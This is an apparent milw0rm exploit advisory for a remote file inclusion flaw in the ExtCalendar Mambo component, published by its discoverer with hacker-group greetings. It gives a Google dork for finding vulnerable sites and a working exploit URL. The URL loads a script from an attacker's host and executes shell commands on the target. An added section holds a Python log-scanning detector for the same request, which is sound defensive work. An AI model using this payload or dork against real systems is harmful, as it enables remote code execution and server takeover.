--------------------------------------------------------------------------------
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
###############################################################################

Discovered By OLiBekaS
-----------------------------------------------------------------------------

dork : "powered by ExtCalendar v2"
Exploit :
http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls
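
Detection note (added example, not part of the original advisory): the request above is recognisable in web server access logs because CONFIG_EXT[LANGUAGES_DIR] carries a scheme:// value. The sketch below flags such requests; the log format (common/combined) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path and parameter name as they appear in the advisory's request.
SCRIPT = "components/com_extcalendar/admin_events.php"
PARAM = "CONFIG_EXT[LANGUAGES_DIR]"
# A language directory setting should never start with scheme:// (http, ftp, ...).
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Request field of a common/combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jul/2006:10:00:01 +0000] "GET /cal/components/com_extcalendar/'
    'admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://192.0.2.10/cmd.txt?&cmd=ls HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Jul/2006:10:02:11 +0000] "GET /components/com_extcalendar/'
    'admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=ftp%3A%2F%2F192.0.2.10%2Fx HTTP/1.0" 200 90',
    '198.51.100.4 - - [17/Jul/2006:10:03:40 +0000] "GET /components/com_extcalendar/'
    'admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=languages/ HTTP/1.1" 200 300',
    '198.51.100.4 - - [17/Jul/2006:10:04:02 +0000] "GET /index.php?option=com_extcalendar HTTP/1.1" 200 4096',
]


def remote_include_value(target):
    """Return the offending parameter value, or None if the request looks clean."""
    parts = urlsplit(target)
    if not unquote(parts.path).endswith(SCRIPT):
        return None
    # parse_qsl percent-decodes names and values, so %5B / %5D variants match too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM and REMOTE.match(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, value) for each log line matching the advisory's pattern."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        value = remote_include_value(m.group(1)) if m else None
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(ip, value)
```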

-----------------------------------------------------------------------------

greatz:
~~~~~
# Special greetz to my master effex and bEdAh‘oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------

Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-07-17]
com_extcalendar Mambo Component 2.0 Include Vulnerability
OLiBekaS
07/17/2006